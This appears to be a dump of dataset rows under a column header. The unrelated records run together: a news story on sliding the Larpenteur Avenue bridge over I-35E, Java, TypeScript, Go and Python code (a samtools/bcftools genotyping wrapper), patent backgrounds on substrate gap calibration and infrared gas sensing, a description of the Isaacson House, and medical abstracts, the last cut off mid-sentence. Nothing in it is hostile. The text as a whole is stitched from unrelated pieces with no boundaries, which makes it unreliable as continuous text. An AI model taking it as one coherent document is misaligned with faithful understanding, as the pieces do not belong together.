content
stringlengths
7
2.61M
With hydraulic jacks providing the oomph and "concrete shoes" with Teflon pads underneath to give it glide, MnDOT crews will push the new Larpenteur Avenue bridge over I-35E in to place during the overnight hours Wednesday into Thursday. MnDOT will close both directions of I-35E between I-94 and Hwy. 36 from 9 p.m. Wednesday to 5 a.m. from Thursday when it uses a technique called Slide in Bridge Construction (SIBC), something that has used in a handful of other states and is being tried in Minnesota for the first time. "It's pretty cool," said spokeswoman Bobbie Dahlke, but it's definitely not fast. It will take up to eight hours to move the 3.5 million-pound deck and beams from a temporary structure nearby where it was built onto the newly constructed new piers and abutments. MnDOT will use hydraulic jacks that will push the deck laterally at the slow and methodical rate of 19 inches per stroke to cover the distance of 84 feet. Motorists might experience brief closures of up to 15 minutes at time overnight Tuesday into Wednesday as MnDOT gets ready for the big move. On Wednesday, lane restrictions in the vicinity of Larpenteur Avenue will begin at 7 p.m. and a number of ramps will shut down at 8 p.m. They include ramps to and from I-35E at Maryland Avenue, Wheelock Pkwy., Roselawn Avenue and Hwy. 36. Motorists will be detoured on I-694 and I-94 to bypass the closure. MnDOT built the deck for the new Larpenteur bridge on temporary framework to the north of the previous bridge. That allowed the agency to keep Larpenteur over I-35E open to traffic longer and minimize the length of traffic disruptions. The estimated timeframe from closure of the old bridge to opening of the new one is estimated at 35 days, compared to 60 days for bridges of similar size recently built at Arlington Avenue and Wheelock Pkwy., MnDOT said. SIBC, also known accelerated bridge construction, is among the latest innovations states are employing at the suggestion of the Federal Highway Administration, which through its Every Day Counts program, urges states to use new technologies to shorten project delivery, enhance highway safety and mitigate environmental impacts. SIBC has been tried in Oregon, Utah, Missouri, Colorado and Massachusetts, and other states are now looking at using the method. SIBC, which allows bridges to be moved laterally only, is different than the methods used on the recently-built bridges at Arlington Avenue and Wheelock Pkwy. In those cases, the bridges were built off site and moved into place through a process called Self Propelled Modular Transporter (SPMT). That process uses a vehicle that jacks up the beams and deck from its staging area and moves the superstructure laterally, vertically and even in a circle if necessary. The parts can be moved hundreds of miles if surface conditions allow for it. MnDOT also used SPMT when building the new Hastings Hwy. 61 bridge. That bridge was built on land, then loaded onto a barge and floated down the Mississippi River and lifted into place. The new Larpenteur bridge consists of two spans, each 92 feet. If you don't want to stay up all night to watch the progress, MnDOT says it hopes to capture the event on video and share it on social media sites. The new bridge is just part of the ongoing work along I-35E, which will continue through 2015. The project includes adding a new MnPASS lane to the current three lanes between Little Canada Road and Maryland Avenue, rebuilding bridges along that stretch and resurfacing the freeway. Work also continues on rebuilding I-35E between the Maryland Avenue and University Avenue.
/** * Sweep the next batch for the shard and strategy specified by shardStrategy, with the sweep timestamp sweepTs. * After successful deletes, the persisted information about the writes is removed, and progress is updated * accordingly. * * @param shardStrategy shard and strategy to use * @param sweepTs sweep timestamp, the upper limit to the start timestamp of writes to sweep */ public void sweepNextBatch(ShardAndStrategy shardStrategy, long sweepTs) { metrics.updateSweepTimestamp(shardStrategy, sweepTs); long lastSweptTs = progress.getLastSweptTimestamp(shardStrategy); if (lastSweptTs + 1 >= sweepTs) { return; } log.debug("Beginning iteration of targeted sweep for {}, and sweep timestamp {}. Last previously swept " + "timestamp for this shard and strategy was {}.", SafeArg.of("shardStrategy", shardStrategy.toText()), SafeArg.of("sweepTs", sweepTs), SafeArg.of("lastSweptTs", lastSweptTs)); SweepBatch sweepBatch = reader.getNextBatchToSweep(shardStrategy, lastSweptTs, sweepTs); deleter.sweep(sweepBatch.writes(), Sweeper.of(shardStrategy)); if (!sweepBatch.isEmpty()) { log.debug("Put {} ranged tombstones and swept up to timestamp {} for {}.", SafeArg.of("tombstones", sweepBatch.writes().size()), SafeArg.of("lastSweptTs", sweepBatch.lastSweptTimestamp()), SafeArg.of("shardStrategy", shardStrategy.toText())); } cleaner.clean(shardStrategy, lastSweptTs, sweepBatch.lastSweptTimestamp(), sweepBatch.dedicatedRows()); metrics.updateNumberOfTombstones(shardStrategy, sweepBatch.writes().size()); metrics.updateProgressForShard(shardStrategy, sweepBatch.lastSweptTimestamp()); if (sweepBatch.isEmpty()) { metrics.registerOccurrenceOf(SweepOutcome.NOTHING_TO_SWEEP); } else { metrics.registerOccurrenceOf(SweepOutcome.SUCCESS); } }
<reponame>adlerjohn/l2beat import { expect } from 'earljs' import { PricesController } from '../../../src/api/controllers/PricesController' import { AssetId, Exchange } from '../../../src/model' import { AggregatePriceRepository } from '../../../src/peripherals/database/AggregatePriceRepository' import { ExchangePriceRepository } from '../../../src/peripherals/database/ExchangePriceRepository' import { mock } from '../../mock' describe('PricesController', () => { it('returns transformed aggregate prices', async () => { const aggregatePriceRepository = mock<AggregatePriceRepository>({ async getAllByAssetId(assetId) { expect(assetId).toEqual(AssetId.DAI) return [ { blockNumber: 1n, priceUsd: 2n }, { blockNumber: 3n, priceUsd: 4n }, ] }, }) const exchangePriceRepository = mock<ExchangePriceRepository>() const pricesController = new PricesController( exchangePriceRepository, aggregatePriceRepository ) expect(await pricesController.getPriceHistory(AssetId.DAI)).toEqual([ { blockNumber: '1', priceUsd: '2' }, { blockNumber: '3', priceUsd: '4' }, ]) }) it('returns transformed exchange prices', async () => { const aggregatePriceRepository = mock<AggregatePriceRepository>() const exchangePriceRepository = mock<ExchangePriceRepository>({ async getAllByAssetIdAndExchange(assetId, exchange) { expect(assetId).toEqual(AssetId.DAI) expect(exchange).toEqual(Exchange.uniswapV2('weth')) return [ { blockNumber: 1n, price: 2n, liquidity: 3n }, { blockNumber: 4n, price: 5n, liquidity: 6n }, ] }, }) const pricesController = new PricesController( exchangePriceRepository, aggregatePriceRepository ) expect( await pricesController.getPriceHistoryOnExchange( AssetId.DAI, Exchange.uniswapV2('weth') ) ).toEqual([ { blockNumber: '1', price: '2', liquidity: '3' }, { blockNumber: '4', price: '5', liquidity: '6' }, ]) }) })
// ExampleAgentWalks generates an agent in the given world. // The agent starts off from Node 0. It has 2 addresses that it may // travel between) func ExampleAgentWalks(w *world.World) []world.Walk { a := world.NewAgent(w). WithState(w.Nodes()[0]). WithAddress(w.Nodes()[0]). WithAddress(w.Nodes()[1]). WithVisitDistribution([][]float64{ []float64{0.8, 0.2}, []float64{0.5, 0.5}, }). WithK(3). WithExploreProb(0.35) a.Visit(w.Nodes()[2]) a.Explore() a.VisitAddressOrExplore() return a.History }
An electronic device manufacturing system may include one or more process chambers in which substrates are processed to fabricate thereon electronic devices (e.g., integrated circuits and/or flat panel displays). The process chambers may be operated at a vacuum level (ranging from about, e.g., 0.01 Torr to about 80 Torr) and at high temperatures (ranging from about, e.g., 100 degrees C. to 700 degrees C.). A same or different substrate process, such as, e.g., deposition, etching, annealing, curing, or the like of a film layer on a substrate, may take place in each process chamber of the electronic device manufacturing system. Substrate processing may also occur in a loadlock of some electronic device manufacturing systems. A loadlock is a chamber through which substrates are transferred between process chambers and a factory interface for transport elsewhere in an electronic device manufacturing system. In a substrate process, one or more film layers of a desired material having a desired thickness and uniformity may be selectively applied to or removed from a substrate via process delivery apparatus, such as, e.g., a pattern mask and/or a plasma or gas distribution assembly. To ensure that such desired thicknesses and uniformities are precisely applied or removed, a gap between a substrate and the process delivery apparatus should be tightly controlled. However, as the size of process chambers increases to handle larger substrate sizes, larger batch loads of substrates, and higher process temperatures (which may affect the thermal expansion of process components), the desired gap may become more difficult to control. Electronic device manufacturing systems may therefore benefit from improved gap calibration systems and methods.
Bringing best practice to China As the country merges into the world economy, best practice in China will become best practice globally, products developed in China will become global products, and industrial processes developed in China will become global processes. China is at a turning point, and practices once good enough to support a market entry strategy no longer assure success. Whether a company views China as a manufacturing base, an attractive market, or both, world-class execution will be necessary to succeed, and success in China will be needed to survive not only there but around the globe. As China solidifies its roles as a market, a global manufacturer, and a talent pool, executives will find that they must lead in China to lead in the rest of the world. Unique practices developed to enter the market will no longer suffice in China's increasingly competitive environment, particularly if Chinese operations are held to lower performance standards. Instead, multinationals must lead with their strength: world-class processes honed over many years in established markets and adapted to Chinese realities.
Needs Analysis of English for Medical Purposes: A Student Perspective English has been integrated into medical curriculum in higher education in countries where English is not the official language of instruction. For medical studentsnon-English department studentsEnglish has been taught to meet specified academic and professional needs of learners in so-called English for specific purposes (ESP). To ensure that English program is relevant to the learners needs, a need analysis is required. This study aimed to investigate the English needs of the first-year medical students taking a compulsory program of English for academic purposes at Faculty of Medicine, Sultan Agung Islamic University. The data were collected using a questionnaire to assess the medical students purpose of learning English, the importance of learning English, language learning needs of major language skills (reading, writing, listening, speaking) and their preference of assessment type. The data were descriptively analyzed. Forty-five students consisting of 67 % female and 33% male completed the questionnaire. Most students (76%) used English when studying. All students agreed on the importance of English. The most important sub skill included reading technical article in medicine, listening to audio and listening oral presentation, giving spoken presentation, writing medical prescription. Individual achievement was the most preferred type of assessment. The medical students agreed on the importance of English specific purposes. The interpretation of findings will be useful for the design of English for specific purposes in the study setting.
The analytical spectral region for measurement of gases, vapors, and volatile materials relevant—for example only—to oil, gas, and other applications extends from the ultraviolet (UV) to the mid infrared (mid-IR) spectral regions. Because of this, many applications rely upon infrared gas analyzers that are used for continuously measuring the real-time concentration of each component in a gas sample that contains various gas components by selectively detecting the amounts of infrared radiation absorbed by the gas components. Infrared gas analyzers are widely used in various fields because of their excellent selectivity and high measuring sensitivity. Non-dispersive infrared (NDIR) techniques for the analysis of gases for individual species monitoring is one common technique used for an infrared gas analyzer. Traditional NDIR instruments primarily involve mechanical elements, such as filter wheels that are used in the selection of specific filters and their location relative to the optical path between the light source, the sample, and the detector. These commercially available systems are classified as instruments or analyzers. Single-beam and two-beam (double beam) NDIR gas analyzers are available. With single-beam devices, the infrared radiation generated by the infrared emitter is routed after modulation, such as by a rotating diaphragm wheel, through the measuring vessel containing the gas mixture with the measuring gas component to the detector device. In one example configuration for two-beam devices, the infrared radiation may be subdivided into a modulated measuring radiation passing through the measuring vessel and into an inversely-phased modulated comparison radiation passing through a comparison vessel filled with a comparison gas. In such examples, optopneumatic detectors filled with the gas components to be verified and comprising one or more receiver chambers arranged adjacent or to the rear of one another are usually used for the detector device. Such an approach is sometime referred to as infrared gas filter correlation spectroscopy. Other traditional methods of for analysis of multi-component gas and vapor monitoring include the use of Fourier transform infrared (FTIR) spectroscopy and gas chromatography (GC). FTIR spectroscopy relies heavily on measuring the spectra of the key components and then relying on spectral resolution or mathematics to separate and measure the individual contributions from the components. Gas chromatography physically separates the components by the chromatograph and the separated components are measured directly from the chromatogram by a suitable detection system; such as a flame ionization detection (FID) system. While both of these are standard reference methods, they are both expensive and may generate a significant service or operating overhead when implemented in a continuous monitoring system, particularly in the case of GC, which requires the use of high purity compressed gases. Similarly, mass spectrometry is another method for analyzing multi-component gas and/or vapor analysis that works by measuring the mass-to-charge ratio and abundance of gas-phase ions within a high vacuum. This method is also costly and hard to reduce to a scalable sensor that can be used for commercial sensing aspects. Other spectroscopy methods used in monitoring fluids include those disclosed in U.S. Pat. No. 7,339,657 to Coates et al., which is incorporated herein by reference. These examples feature near infrared light-emitting diodes (LEDs) are used for oil condition measurements (soot level) and urea. The soot measurement is a simple photometric measurement with one primary wavelength (940 nm), while the urea quality sensor is a true spectral measurement with a three-point determination having two analytical wavelengths, 970 nm and 1050 nm, for water and urea, and one as reference/baseline, 810 nm. In both cases attenuation of signal intensity is used to compute the infrared (near-infrared) absorption, and this is correlated to the concentrations of soot (in oil) and the relative concentrations of water and urea in the binary mixture/solution. LED components are available that support an extended spectral region from the UV region to around 250 nm and mid-IR from the about 3 to about 5 micron region. These devices are currently expensive, and do not have a good usable lifetime in the context of low-cost automotive sensors. Both of these LED regions are important for the application to gas and vapor sensing. The mid-infrared is an established region for gas and vapor monitoring, primarily the combustion gases, CO and CO2, and to some extent NOx and other pollutant gases. However, some other NOx gases and other vapors have a spectral range in the UV region that these LEDs cannot adequately reach. However, existing LED sensing platforms are not reliable for high temperature gas monitoring, and the implementation relative to the optics required is difficult, if not impossible. While using a NDIR concept as a dedicated sensor is feasible, it is not practical because a long physical optical path is required for IR detection, and major combustion gas components, such as carbon dioxide (CO2), carbon monoxide (CO) and water, are all infrared absorbers. Water in particular can become a matrix interferent and prevent accurate readings. Additionally, commercial artificial noses may be used to determine the components of a gas or vapor sample. These artificial noses are based on the responses of an array of conductive polymers that are correlated to smells and odors of gases and vapors. These are expensive devices, are easily contaminated, and are inferential relative to the smell or odor of the vapor. Unlike the spectral nose function of the present invention, these artificial noses have no direct correlation to the actual function of the human nose. There exists a need to provide the same functionality of the instruments and analyzers described above but within a single electronic package, where the source, sample, and detector are reduced into the size of a sensor package. Additionally, there is a need to provide a sensor that is capable of monitoring a wide spectral band from the UV to the mid-infrared regions. The present invention can be used in a wide variety of industries where gas sensing and monitoring is critical, especially related to the analysis, safety, and measurement of gases and vapors. The present invention also provides a much broader spectral sensor package for vapors, gases, and other materials that were not previously capable of being monitored in a cost efficient manner.
#!/usr/bin/python # # Copyright (c) 2012 <NAME> <<EMAIL>> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # """Wrapper around "samtools mpileup | bcftools view", to improve performance when genotyping sparse regions (e.g. sets of exons / RNAs / or similar), and allow transparent multi-threading. Alternatively, only "samtools mpileup" may be called, in order to generate pileups for a set of regions. There are 3 main motivations for this wrapper: 1. Current versions of SAMTools read the full contents of the input BAM, when a BED file of regions is specified, even if these regions cover only a fraction of sites. This can be somewhat mitigated by ALSO specifying a region using -r, which fetches just that region, but this does not scale well for thousands of individual regions. 2. It provides transparent parallelization, allowing any set of bed regions to be split and processed in parallel. """ import os import sys import shutil import signal import argparse import traceback import multiprocessing import pysam from pypeline.common.bedtools import \ read_bed_file, \ sort_bed_by_bamfile from pypeline.nodes.samtools import \ samtools_compatible_wbu_mode import pypeline.tools.factory as factory import pypeline.common.procs as processes class BatchError(RuntimeError): pass # Size of smallest block in (linear) BAM index (= 2 << 14) _BAM_BLOCK_SIZE = 16384 ############################################################################### ############################################################################### # CLI functions def build_call(call, args, positional, new_args): call = list(call) args = dict(args) for new_arg in new_args: key, value = new_arg, None if "=" in new_arg: key, value = new_arg.split("=", 1) args[key] = value for (key, value) in sorted(args.iteritems()): call.append(key) if value is not None: call.append(value) call.extend(positional) return call ############################################################################### ############################################################################### # BAM filtering mode import time def filter_bam(bamfile, bedfile): with pysam.Samfile(bamfile) as bam_handle_in: regions = collect_regions(bedfile, bam_handle_in) regions.reverse() write_mode = samtools_compatible_wbu_mode() with pysam.Samfile("-", write_mode, template=bam_handle_in) as bam_handle_out: while regions: region_aend = 0 contig, start, end = regions[-1] for record in bam_handle_in.fetch(contig, start): current_aend = record.aend region_aend = max(region_aend, current_aend) if record.pos > end: last_contig, _, _ = regions.pop() if not regions: break contig, start, end = regions[-1] if (region_aend + _BAM_BLOCK_SIZE < start) \ or (contig != last_contig): break if current_aend >= start: bam_handle_out.write(record) else: # Reached the end of this contig while regions and (regions[-1][0] == contig): regions.pop() return 0 ############################################################################### ############################################################################### # Common functions def cleanup_batch(setup): sys.stderr.write("Cleaning up batch ...\n") for handle in setup["handles"].itervalues(): handle.close() for proc in setup["procs"].itervalues(): if proc.poll() is None: proc.terminate() proc.wait() for filename in setup["temp_files"].itervalues(): sys.stderr.write("Removing temporary file %r\n" % (filename,)) os.remove(filename) def write_bed_file(prefix, regions): fpath = prefix + ".bed" with open(fpath, "w") as bed_handle: for (contig, start, end) in regions: bed_handle.write("%s\t%i\t%i\n" % (contig, start, end)) bed_handle.flush() return fpath def setup_basic_batch(args, regions, prefix, func): setup = {"files": {}, "temp_files": {}, "procs": {}, "handles": {}} try: setup["files"]["bed"] = write_bed_file(prefix, regions) setup["temp_files"]["bed"] = setup["files"]["bed"] filter_builder = factory.new("genotype") filter_builder.set_option("--filter-only") filter_builder.set_option("--bedfile", setup["files"]["bed"]) filter_builder.add_option(args.bamfile) filter_builder.add_option(args.destination) setup["procs"]["filter"] \ = processes.open_proc(filter_builder.call, stdout=processes.PIPE, close_fds=True) setup["handles"]["outfile"] = open(prefix, "w") zip_proc = processes.open_proc(["bgzip"], stdin=func(setup), stdout=setup["handles"]["outfile"], close_fds=True) setup["procs"]["gzip"] = zip_proc return setup except: sys.stderr.write(traceback.format_exc() + "\n") cleanup_batch(setup) raise ############################################################################### ############################################################################### # Pileup batch generation def setup_mpileup_batch(args, regions, prefix): def _create_mpileup_proc(setup): mpileup_args = {"-l": setup["files"]["bed"]} call = build_call(call=("samtools", "mpileup"), args=mpileup_args, new_args=args.mpileup_argument, positional=("-",)) sys.stderr.write("Running 'samtools mpileup': %s\n" % (" ".join(call))) procs = setup["procs"] procs["mpileup"] \ = processes.open_proc(call, stdin=procs["filter"].stdout, stdout=processes.PIPE, close_fds=True) return procs["mpileup"].stdout return setup_basic_batch(args, regions, prefix, _create_mpileup_proc) ############################################################################### ############################################################################### # Genotyping batch generation def setup_genotyping_batch(args, regions, prefix): def _create_genotyping_proc(setup): mpileup_args = {"-u": None, "-l": setup["files"]["bed"]} mpileup_call = build_call(call=("samtools", "mpileup"), args=mpileup_args, new_args=args.mpileup_argument, positional=("-",)) sys.stderr.write("Running 'samtools mpileup': %s\n" % (" ".join(mpileup_call))) procs = setup["procs"] procs["mpileup"] \ = processes.open_proc(mpileup_call, stdin=procs["filter"].stdout, stdout=processes.PIPE, close_fds=True) bcftools_call = build_call(call=("bcftools", "view"), args={}, new_args=args.bcftools_argument, positional=("-",)) sys.stderr.write("Running 'bcftools call': %s\n" % (" ".join(bcftools_call))) procs["bcftools"] \ = processes.open_proc(bcftools_call, stdin=procs["mpileup"].stdout, stdout=processes.PIPE, close_fds=True) return procs["bcftools"].stdout return setup_basic_batch(args, regions, prefix, _create_genotyping_proc) ############################################################################### ############################################################################### def setup_batch(args, regions, filename): """Setup a batch; either a full genotyping, or just a pileup depending on 'args.pileup_only'; the results are written to 'filename'. """ if args.pileup_only: return setup_mpileup_batch(args, regions, filename) return setup_genotyping_batch(args, regions, filename) def run_batch((args, regions, filename)): setup = setup_batch(args, regions, filename) try: if any(processes.join_procs(setup["procs"].values())): return None return filename except: # Re-wrap exception with full-traceback; otherwise this information # is lost when the exception is retrieved in the main process. raise BatchError(traceback.format_exc()) finally: cleanup_batch(setup) ############################################################################### ############################################################################### def init_worker_thread(): """Init function for subprocesses created by multiprocessing.Pool: Ensures that KeyboardInterrupts only occur in the main process, allowing us to do proper cleanup. """ signal.signal(signal.SIGINT, signal.SIG_IGN) ############################################################################### ############################################################################### def merge_bed_regions(regions): """Takes a sequence of bed regions [(contig, start, end), ...], which is assumed to be sorted by contig and coordiates, and returns a list in which overlapping records are merged into one larger region. """ merged = [] last_contig = last_start = last_end = None for record in regions: if (record.contig != last_contig) or (record.start > last_end): if last_contig is not None: merged.append((last_contig, last_start, last_end)) last_contig = record.contig last_start = record.start last_end = record.end else: last_start = min(last_start or 0, record.start) last_end = max(last_end, record.end) if last_contig is not None: merged.append((last_contig, last_start, last_end)) return merged def create_batches(args, regions): """Yields a sequence of batches that may be passed to the 'run_batch' function; each batch consists of the 'args' object, a set of BED regions, and a destination filename. The set of BED regions is derived by splitting the total set of regions into args.nbatches portions. """ tmpl = "{0}.batch_%03i".format(args.destination) def _get_batch_fname(count): """Returns a filename for batch number 'count'.""" if count: return tmpl % (count,) return args.destination total_size = sum(end - start for (_, start, end) in regions) batch_size = total_size // args.nbatches + 5 batch_count = 0 current_batch = [] current_total = 0 for (contig, start, end) in regions: while (end - start) + current_total > batch_size: new_end = start + batch_size - current_total current_batch.append((contig, start, new_end)) start = new_end yield args, current_batch, _get_batch_fname(batch_count) current_batch = [] current_total = 0 batch_count += 1 current_batch.append((contig, start, end)) current_total += end - start if current_batch: yield args, current_batch, _get_batch_fname(batch_count) def merge_batch_results(filenames_iter): """Takes a multiprocessing.imap iterator yielding filenames of completed batches (gzipped vcf or mpileup files), and writes these into the file-handle out. """ while True: try: # A timeout allows iteruption by the user, which is not the # case otherwise. The value is arbitrary. target_filename = filenames_iter.next(60) # None signals error in subprocess; see 'run_batch' if target_filename is None: return False sys.stderr.write("Merging into file: %r\n" % (target_filename,)) break except multiprocessing.TimeoutError: pass except StopIteration: return with open(target_filename, "r+") as target_handle: while True: try: filename = filenames_iter.next(60) sys.stderr.write(" - Processing batch: %r" % (filename,)) # BGZip is terminated by 28b empty block (cf. ref) # While the standard implies that these should be ignored # if not actually at the end of the file, the tabix tool # stops processing at the first such block it encounters target_handle.seek(-28, 2) with open(filename) as input_handle: shutil.copyfileobj(input_handle, target_handle) os.remove(filename) except multiprocessing.TimeoutError: pass except StopIteration: break return True def collect_regions(bedfile, bam_input_handle): """Returns the regions to be genotyped / pileup'd, as a list of bed-regions in the form (contig, start, end), where start is zero-based, and end is open based. """ if bedfile is not None: regions = list(read_bed_file(bedfile)) sort_bed_by_bamfile(bam_input_handle, regions) regions = merge_bed_regions(regions) else: regions = [] for (name, length) in zip(bam_input_handle.references, bam_input_handle.lengths): regions.append((name, 0, length)) return regions def process_batches(args, batches): """Runs a set of batches, and merges the resulting output files if more than one batch is included. """ nbatches = min(args.nbatches, len(batches)) pool = multiprocessing.Pool(nbatches, init_worker_thread) try: batches = pool.imap(run_batch, batches, 1) if not merge_batch_results(batches): pool.terminate() pool.join() return 1 pool.close() pool.join() return 0 except: pool.terminate() pool.join() raise def create_empty_bgz(destination): """Writes an empty BGZip file to the given destination; this file contains a single empty BGZip block (28b). """ with open(destination, "w") as output: # Empty BGZip block output.write("\x1f\x8b\x08\x04\x00\x00\x00\x00\x00\xff\x06\x00\x42") output.write("\x43\x02\x00\x1b\x00\x03\x00\x00\x00\x00\x00\x00\x00") output.write("\x00\x00") def parse_args(argv): parser = argparse.ArgumentParser() parser.add_argument("bamfile", metavar='INPUT', help="Sorted and indexed BAM file.") parser.add_argument("destination", metavar='OUTPUT', help="BGZip compressed VCF or pileup. Also used as " "prefix for temporary files.") parser.add_argument('--bedfile', default=None, help="Optional bedfile, specifying regions to pileup " "or genotype [Default: %(default)s].") parser.add_argument('--mpileup-argument', default=[], action="append", help="Pass argument to 'samtools mpileup'; must be " "used as follows: --mpileup-argument=-argument " "for arguments without values, and " "--mpileup-argument=-argument=value for " "arguments with values.") parser.add_argument('--bcftools-argument', default=[], action="append", help="Pass argument to 'bcftools view'; see the " "--mpileup-argument command description.") parser.add_argument('--pileup-only', default=False, action="store_true", help="Only run 'samtools mpileup', generating a text " "pileup instead of a VCF file [Default: off].") parser.add_argument('--nbatches', metavar="N", default=1, type=int, help="Split the BED into N number of batches, which " "are run in parallel [Default: %(default)s].") parser.add_argument('--overwrite', default=False, action="store_true", help="Overwrite output if it already exists " "[Default: no].") # When set, the --bedfile argument is read and used to filter the BAM # specified for the 'bamfile' parameter; all other parameters are ignored. parser.add_argument('--filter-only', default=False, action="store_true", help=argparse.SUPPRESS) return parser.parse_args(argv) def main(argv): args = parse_args(argv) if args.filter_only: if not args.bedfile: sys.stderr.write("--filter-only requires --bedfile; terminating\n") return 1 return filter_bam(args.bamfile, args.bedfile) if os.path.exists(args.destination) and not args.overwrite: sys.stderr.write("Output already exists; use --overwrite to allow " "overwriting of this file.\n") return 1 with pysam.Samfile(args.bamfile) as bam_input_handle: regions = collect_regions(args.bedfile, bam_input_handle) batches = list(create_batches(args, regions)) if not batches: create_empty_bgz(args.destination) return 0 try: return process_batches(args, batches) except BatchError, error: sys.stderr.write("ERROR while processing BAM:\n") sys.stderr.write(" %s\n" % ("\n ".join(str(error).split("\n"),))) return 1 return 0
Philip M. and Deborah N. Isaacson House Description and history The Isaacson House stands in a residential area west of the Bates College campus and north of downtown Lewiston, on the west side of Benson Street. It is a single-story square structure with a flat roof, and is set further back from the street than neighboring houses. A central stone walkway approaches the house, which is set on a terraced rise accessed via floating stone steps. The exterior is finished in vertical siding, and features floor-to-ceiling windows with white trim. At the center of the front facade is a doorway-sized opening leading into a courtyard, which functions as a transitional space between the outside and inside. The main block of the house is divided into rooms three wide and three deep. Interior finish details include custom millwork and hardware. The house was built in 1959 for Philip M. Isaacson, a young lawyer and Lewiston native. Isaacson had become interested in modern architecture while studying law at Harvard Law School, and initially approached Josep Lluís Sert with a proposition to design a small year-round house that could be built for $25,000. Sert rejected his proposal, and Isaacson eventually commissioned F. Frederick Bruck, a young architect trained at the Bauhaus-influenced Harvard Graduate School of Design for the job. The house that Bruck designed ended up costing $32,000. Even the smallest details of interior finishes were included in his design. The house was named one of America's outstanding homes by the American Institute of Architects.
Red cell aggregation induced by a high molecular weight gelatin plasma substitute. In the course of clinical investigation of a new higher molecular weight plasma substitute made of gelatin (MW 60,000), severe side reactions were observed in 2 patients. As the erythrocyte sedimentation rate was markedly raised in both patients after the gelatin infusion, it was thought that these reactions might result from the effect of the gelatin solution on red cell aggregation. The effect of gelatin solutions on red cell aggregation was studied in vitro on human blood and in vivo in dogs using the erythrocyte sedimentation rate and an optical density method to assess its degree. It was shown by all methods that the high molecular weight gelatin fraction induced marked red cell aggregation and it has been concluded that the present gelatin solution cannot be recommended for use in clinical practice.
Cigarette smoking, genetic polymorphisms and colorectal cancer risk: the Fukuoka Colorectal Cancer Study Background It is uncertain whether smoking is related to colorectal cancer risk. Cytochrome P-450 CYP1A1, glutathione-S-transferase (GST) and NAD(P)H:quinone oxidoreductase 1 (NQO1) are important enzymes in the metabolism of tobacco carcinogens, and functional genetic polymorphisms are known for these enzymes. We investigated the relation of cigarette smoking and related genetic polymorphisms to colorectal cancer risk, with special reference to the interaction between smoking and genetic polymorphism. Methods We used data from the Fukuoka Colorectal Cancer Study, a population-based case-control study, including 685 cases and 778 controls who gave informed consent to genetic analysis. Interview was conducted to assess lifestyle factors, and DNA was extracted from buffy coat. Results In comparison with lifelong nonsmokers, the odds ratios (OR) of colorectal cancer for <400, 400-799 and ≥800 cigarette-years were 0.65 (95% confidence interval , 0.45-0.89), 1.16 (0.83-1.62) and 1.14 (0.73-1.77), respectively. A decreased risk associated with light smoking was observed only for colon cancer, and rectal cancer showed an increased risk among those with ≥400 cigarette-years (OR 1.60, 95% CI 1.04-2.45). None of the polymorphisms under study was singly associated with colorectal cancer risk. Of the gene-gene interactions studied, the composite genotype of CYP1A1*2A or CYP1A1*2C and GSTT1 polymorphisms was associated with a decreased risk of colorectal cancer, showing a nearly statistically significant (Pinteraction = 0.06) or significant interaction (Pinteraction = 0.02). The composite genotypes of these two polymorphisms, however, showed no measurable interaction with cigarette smoking in relation to colorectal cancer risk. Conclusions Cigarette smoking may be associated with increased risk of rectal cancer, but not of colon cancer. The observed interactions between CYP1A1 and GSTT1 polymorphisms warrant further confirmation. Background Both environmental and genetic factors are thought to play an important role in colorectal carcinogenesis. The role of genetic factors in the etiology of colorectal cancer is estimated to be 35% in a twin study. Recent genome-wide association studies have identified several novel single nucleotide polymorphisms (SNPs) associated with colorectal cancer risk, suggesting the importance of combination of low-penetrance genes. Furthermore, it is estimated that one SNP is involved in approximately 15% of colorectal cancer in European populations. A large number of studies have consistently shown that cigarette smoking is associated with increased risk of colorectal adenoma, a well-established precursor lesion of colorectal cancer, as reviewed elsewhere. The findings on smoking and colorectal cancer are inconsistent, however. While a recent meta-analysis reported a statistically significant 1.18-fold increase in the risk of colorectal cancer associated with smoking, individual studies showed a weak or null association between smoking and colorectal cancer. For example, several studies suggested a modest increase in the risk of colorectal cancer associated with smoking, but other studies failed to find such a positive association. Tobacco smoke contains various types of carcinogens such as polycyclic aromatic hydrocarbons (PAHs), heterocyclic amines, aromatic amines and N-nitrosamines which require metabolic activation and detoxification by different enzymatic pathways, including cytochrome P-450 (CYP), glutathione-S-transferases (GSTs) and NAD(P)H:quinone oxidoreductase 1 (NQO1). CYP1A1 is a phase I, predominantly extrahepatic, microsomal enzyme involved in the bioactivation of PAHs including benzo(a)pyrene. Two functional polymorphisms are known in the CYP1A1 gene; one is 3698T>C substitution (CYP1A1*2A, rs 4646903) creating an MspI restriction site in the 3'-flanking region, and the other is 2454A>G substitution (CYP1A1*2C, rs 1048943) resulting in an amino acid change in exon 7 (Ile462Val). The CYP1A1*2A and CYP1A1*2C alleles are putatively linked to higher inducibility of the enzyme, and some studies have suggested an increased risk of tobacco-related cancers associated with these variant alleles. An increased risk of in situ colorectal carcinoma associated with CYP1A1*2A was reported in a small case-control study in Hawaii, but no association between CYP1A1*2A and colorectal cancer was observed in subsequent studies. CYP1A1*2C was unrelated to colorectal cancer risk in these studies, but was associated with an increased risk in another study. GSTs are a superfamily of detoxification enzymes that facilitate the inactivation of chemical carcinogens and environmental toxic compounds. GSTs consist of several classes of genes, and GSTM1 and GSTT1 polymorphisms have been investigated most intensively in relation to tobacco-related cancers. The null genotypes of these polymorphisms result in a complete loss of enzyme function and thus may be at increased risk of tobacco-related cancers. Results on GSTM1 and GSTT1 polymorphisms in relation to colorectal cancer are inconsistent as reviewed elsewhere. The GSTP1 gene also has a functional polymorphism, but this polymorphism is unlikely to play an important role for smoking-related cancers. The NQO1 is involved in detoxification through their two electron reduction to hydroquinones, thereby 